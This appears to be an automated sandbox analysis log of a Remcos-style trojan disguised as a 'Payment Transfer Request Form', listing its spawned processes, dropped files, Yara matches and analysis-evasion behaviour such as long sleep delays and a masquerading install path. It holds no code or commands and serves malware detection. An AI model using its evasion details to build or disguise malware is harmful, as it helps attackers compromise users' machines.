              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe — Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe — Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe — Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\AppUpdate\remcos.exe — Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match - File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara match - File source: Process Memory Space: iKgKaogJ.exe PID: 7508, type: MEMORYSTR
              Source: Yara match - File source: Process Memory Space: remcos.exe PID: 7704, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0040E18D Sleep,ExitProcess, 9_2_0040E18D
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 2560000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 27D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 2560000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 7720000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 8720000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 88D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Memory allocated: 98D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 1330000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 3080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 2E80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 7A80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 8A80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 8C20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Memory allocated: 9C20000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 1060000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 2DA0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 4DA0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 78B0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 88B0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8A50000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 9A50000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 15A0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 3140000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 2F60000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 7B10000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8B10000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8CB0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 9CB0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 2D30000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 2EC0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 4EC0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 7960000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8960000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8B00000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 9B00000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 1210000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 3080000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 1240000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 7930000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8930000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 8AC0000 memory reserve | memory write watch
              Source: C:\ProgramData\AppUpdate\remcos.exe - Memory allocated: 9AC0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 9_2_004186FE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe - Thread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exe - Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exe - Window found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 5777
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7007
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 355
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 5690
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6346
              Source: C:\ProgramData\AppUpdate\remcos.exe - Window / User API: threadDelayed 9765
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Evaded block: after key decision graph_9-46338
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Evaded block: after key decision graph_9-46434
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - API coverage: 5.2 %
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe TID: 5236 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248 - Thread sleep count: 5777 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412 - Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 - Thread sleep count: 132 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424 - Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe TID: 7544 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 7720 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032 - Thread sleep count: 5690 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3112 - Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016 - Thread sleep count: 180 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184 - Thread sleep count: 229 > 30
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184 - Thread sleep time: -687000s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184 - Thread sleep count: 9765 > 30
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 8184 - Thread sleep time: -29295000s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 1072 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 7368 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\AppUpdate\remcos.exe TID: 5336 - Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe - Code function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 9_2_0041A01B
